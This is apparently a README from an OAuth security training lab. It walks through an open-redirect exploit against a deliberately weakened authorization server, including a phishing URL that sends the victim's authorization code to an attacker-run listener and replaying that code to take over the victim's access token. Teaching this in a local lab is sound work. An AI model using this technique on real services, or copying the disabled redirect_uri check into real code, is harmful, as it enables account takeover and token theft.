Skip to content

Latest commit

 

History

History

ex2

README.md

Exercise 2

This is an exercise that exploits the open redirect vulnerability. The goal is to gail access token that tied to victim's account.

Setup

$ git clone https://github.com/melonattacker/oauth-exploit-lab.git
$ cd oauth-exploit-lab/exercise/ex2
$ docker-compose up -d

URL

target URL
client http://localhost:10000
crawler http://localhost:10003

Account

username password
bob(attacker) hoge
tom(victim) huga

Writeup

You can see that the verification of redirect_uri in the authorization server is insufficient.

    # if request.args.get('redirect_uri') not in client['redirect_uris']:
    #     print('Mismatched redirect URI, expected %s but got %s' % (client['redirect_uris'], request.args.get('redirect_uri')))
    #     return render_template('error.html', error='Invalid redirect URI')

This makes it vulnerable to open redirect. To exploit this, an attacker go through the authorization process under his account and modify redirect uri to his owned server. Then make the victim click on the link.

First go through the authorization process and create a URL containing redirect uri. To do that, you can use exploit/create_url.py.

$ python3 exploit/create_url.py
Fishing URL: http://auth_server:10001/authorize?response_type=code&client_id=oauth-client-1&redirect_uri=http%3A%2F%2Fhost.docker.internal%3A8080&state=5NFM0JRI0CGVSPTU6UXHVZNXSP0BANSD&scope=hoge+huga

Next, you start http server on port 8080.

$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Then have the crawler(http://localhost:10003) visit the created URL.

When it's done, you'll see a response like this.

State and authorization code is sent to attacker's server.

And you can see code and state on your server log.

127.0.0.1 - - [09/Sep/2022 00:19:25] "GET /?code=UDIGZLSL&state=5NFM0JRI0CGVSPTU6UXHVZNXSP0BANSD HTTP/1.1" 200 -

If you visit the link http://localhost:10000/callback?code=UDIGZLSL&state=5NFM0JRI0CGVSPTU6UXHVZNXSP0BANSD as attacker(bob), you can gain access token. And if you click Get Protected Resource button, you can see tom's resource.